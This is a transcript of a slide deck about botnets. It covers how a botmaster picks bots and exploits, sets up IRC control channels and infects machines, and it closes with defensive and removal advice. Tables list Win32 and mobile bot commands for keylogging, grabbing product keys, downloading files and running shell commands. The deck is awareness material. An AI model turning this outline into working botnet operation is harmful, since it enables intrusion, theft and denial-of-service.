botnet
TRANSCRIPT
BOTNET BATTLE
A single compromised computer can be a pain to deal with, but a
collection of compromised computers can wreak havoc around
the world.
Leaving our computer vulnerable to attack makes us a danger,
not just to ourselves but to everyone on the internet.
How do botnets work?
What’s the risk?
How can we protect ourselves?© ARAGAS
WHAT IS A BOTNET?
The term bot is short for robot.
Criminals distribute malware turning our computer into a bot.
Computers perform automated tasks over the internet
without us knowing it.
Criminals use bots to infect large number of computers.
These computers form a network which is popularly called as
botnet.© ARAGAS
RISKS OF BOTNET
Criminals use botnets to
Send out spam email messages.
Spread viruses.
Attack computers + servers.
Commit other kinds of crime + fraud.
If our computer becomes part of a botnet, then our
computer might slow down and we might be helping
cyber criminals indirectly. © ARAGAS
DEBUTS IN 2000
In the year 2000, a Canadian teenager launched
a series of distributed denial-of-service attacks
against several high-profile web sites.
The teen targeted Yahoo, Dell, eBay, amazon
and many others by flooding the sites with
massive amounts of junk traffic until their
servers crashed.© ARAGAS
BOTNETS CLASSIFICATION
Botnets can be classified into two prime categories:
Legal botnets
Illegal botnets
© ARAGAS
LEGAL BOTNETS
The term botnet is widely used when several IRC bots have
been linked and set channel modes on other bots and users
while keeping IRC channels free from unwanted users.
This is where the term is originally from, since the first illegal
botnets were similar to legal botnets.
A common bot used to set up botnets on IRC is eggdrop.
© ARAGAS
ILLEGAL BOTNETS
Botnets sometimes infect computers whose security defences
have been violated and control granted to a third party.
Each such infected device, known as a "bot", is created when a
computer is penetrated by software from a malware distribution.
The botmaster directs the activities of these infected computers
through communication channels formed by IRC and HTTP.
© ARAGAS
WHAT IS A BOT?
A "bot" is a type of malware that allows an attacker to take
control over an affected computer.
Bots are usually part of a network of infected machines.
Since a bot infected computer does the bidding of its master,
many people refer to these victim machines as zombies.
The cybercriminals that control these bots are called
botmasters.© ARAGAS
BOT + EXPLOIT SELECTION
Botnets typically begin when Botmaster downloads a botprogram and exploit code.
Bot programs such as AgoBot, IRCBot, etc are freelyavailable on the internet.
Exploits for Windows OS are generally selected.
These exploits are attractive both due to large number ofexploits available and the widespread adoption ofWindows amongst business + residential users.© A
RAGAS
CONTROL CHANNEL
After selecting the bot + exploit combination, the
Botmaster must now setup one or more control channels.
The most common technique is to use public IRC servers to
control the botnet.
The Botmaster needs a control channel in order to issue
commands to and receive feedback from the botnet.
Control channels are frequently moved to avoid detection.© ARAGAS
INITIAL INFECTION
The Botmaster must now begin to build the zombie army
that will include the botnet.
Using the chosen exploit, the Botmaster cracks and takes
control over a handful of systems.
© ARAGAS
C + C MECHANISM
COMMAND AND CONTROL MECHANISM
A collection of computers is useless without some
control mechanism.
The command and control constitutes the
interface between the botnet and the botmaster.
The botmaster commands the c&c.
The c&c commands the bots. © ARAGAS
DOSNET
A type of botnet & mostly used as a term for malicious
botnets.
DoSnets are used for DDoS attacks which can be very
devastating.
Well-known DoSnet software includes
→ TFN2k
→ Stacheldraht
→ Trinoo.© ARAGAS
DOSBOT
The denial of service bot is the client which is used to connect
to the network.
It’s also the software which performs any attacks.
The vast majority of the bots are written in the
→ C
→ C++
→ Java © ARAGAS
WAREZ
Botnets can be used to steal, store, or propagate warez.
Warez constitutes any illegally obtained or pirated
software.
Bots can search hard drives for software and licenses
installed on a victims machine.
Botmasters can easily transfer it off for duplication and
distribution.© ARAGAS
CONTROLLING BOTNET
Command Function
.capture. Generates and saves an image or video file.
.download. Downloads a file from a specified URL to the victim’s computer.
.find file. Finds files on the victim’s computer by name and returns the paths of any files found.
.getcdkeys. Returns product keys for software installed on the victim’s computer.
.key log. Logs the victim’s keystrokes and saves them to a file.
.open. Opens a program, an image, or a URL in a web browser.
.procs. Lists the processes running on the victim’s computer.
Some of the Botnet Commands from Win32 bot family:
© ARAGAS
HOW BOTS WORK?
Bots creep into a person’s computer in many ways.
Bots often spread themselves across the internet by looking for
vulnerable, unprotected computers to infect.
When they find an exposed computer, they quickly infect the
machine and then report back to their master.
Their goal is then to stay hidden until they are instructed to carry
out a task.© ARAGAS
AUTOMATED TASKS BY BOTS
Sending Stealing Denial of Service Click fraud
They send
→ Spam→ Viruses→ Spyware
They steal personal and privateinformation and communicate itback to the malicious user:
→ Bank credentials→ Credit card numbers→ Sensitive informations
Launching denialof service (DoS)attacks against aspecified target.
Fraudsters use botsto boost webadvertising billingsby automaticallyclicking on internetads.
© ARAGAS
PROTECT AGAINST BOTS
Limit your user rights when online.
Install top-rated security software.
Increase the security settings on your browser.
Update automatically to latest system patches.
Configure your software's settings to update automatically.
Never click on attachments unless you can verify the source.© ARAGAS
DETECTION + REMOVAL 1
RUBOTTED 2.0 BETA
Monitors our computer for potential infection and suspicious
activities associated with bots.
Protect our system by continuously monitoring our computer for
potential infection and suspicious activities with Rubotted.
→ downloadcenter.trendmicro.com
© ARAGAS
DETECTION + REMOVAL 2
MALICIOUS SOFTWARE REMOVAL TOOL
Checks our computer for infection by specific, prevalent
malicious software and removes the infection if it is found.
Microsoft releases an updated version of this tool on the
second Tuesday of each month.
→microsoft.com
© ARAGAS
DETECTION + REMOVAL 3
NORTON™ POWER ERASER
Eliminates deeply embedded and difficult to remove crimeware
that traditional virus scanning doesn't always detect.
Norton Power Eraser is specially designed to aggressively target
scamware.
→ security.symantec.com
© ARAGAS
MOBILE BOTNETS
Targets smartphones, attempting to gain complete
access to the device and its contents as well as
providing control to the botmaster.
Mobile botnets give admin rights of the compromised
mobile devices, enabling hackers to
→ Send e-mail or text messages
→ Make phone calls
→ Access contacts and photos, and more.© ARAGAS
EXAMPLES OF MOBILE BOTNETS
The Dreamdroid malware that compromised the Android devices.
The iPhone SMS attack that affected iPhone + iPad devices.
The Commwarrior affected Symbian series mobile devices.
The Zitmo that targeted Blackberry users.
© ARAGAS
CONTROLLING MOBILE BOTNET
Command Function
Add Phone Number(s) Adds numbers to the forwarding list.Commands are forwarded to all bots on the list.
Set sleep interval Sets how long the client waits before searching the P2P network for acommand.
Execute shell sequence Run a command in the shell.
Download URL Downloads a command file from the botmasters.
Some of the Botnet Commands from iBot family:
© ARAGAS
PROTECT AGAINST MOBILE BOTS
Install the latest official OS for your smartphone.
Avoid pirated apps or apps from untrusted sources.
Download apps only from trusted and reputable app stores.
© ARAGAS
DETECTION + REMOVAL
BULLGUARD MOBILE SECURITY 10
Detects and removes malware.
Monitor information that is being sent and received.
Remotely manage and monitor the smartphone.
→ bullguard.com
© ARAGAS